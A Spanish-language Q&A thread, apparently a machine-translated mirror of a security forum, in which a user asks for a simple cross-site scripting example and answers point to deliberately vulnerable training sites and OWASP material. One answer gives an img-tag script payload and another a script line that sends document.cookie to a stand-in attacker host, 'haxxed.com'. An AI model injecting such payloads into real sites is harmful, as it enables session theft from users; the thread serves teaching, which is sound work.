Un ejemplo simple de un ataque de scripting entre sitios [cerrado]
¿Puede alguien mostrarme un ataque Cross-site scripting en efecto en mi navegador? ¿Hay algún ejemplo en Internet que haga esto? No he encontrado esto en Internet.
Cuanto más simple sea el ejemplo, mejor.
4 answers
Véase http://www.insecurelabs.org y http://www.insecurelabs.org/task /
Intencionalmente vulnerable a XSS en el campo de búsqueda y varios otros lugares.
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2012-03-07 06:55:55
Generalmente tendrá que instalar su propio software del lado del servidor para un ejemplo XSS en vivo. No muchos sitios legítimos abrirán un defecto XSS intencionalmente a los internautas.
Una pieza ya hecha de software del lado del servidor que le permite demostrar XSS (entre muchas otras cosas) a sí mismo es WebGoat de OWASP. Aquí están instrucciones para instalar WebGoat y demostrar XSS. Encontrará ejemplos adicionales de fragmentos de programa que habilitan XSS en el artículo de OWASP " Cross-site scripting (XSS) ".
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2012-03-06 12:58:16
<img src="javascript:alert('hello everybody')"></img>
La etiqueta de imagen que inserté es un ejemplo de xss. el src anterior contiene el script java que le avisa.
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2014-01-09 05:03:59
La forma simple también sería: Si el cuadro de mensaje aparece, ya sabes, que la página o el servidor es vulnerable.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Una gran muestra de cómo funciona la técnica se puede encontrar aquí https://www.hacksplaining.com/exercises/xss-stored
Warning: date(): Invalid date.timezone value 'Europe/Kyiv', we selected the timezone 'UTC' for now. in /var/www/agent_stack/data/www/ajaxhispano.com/template/agent.layouts/content.php on line 61
2017-09-12 18:47:30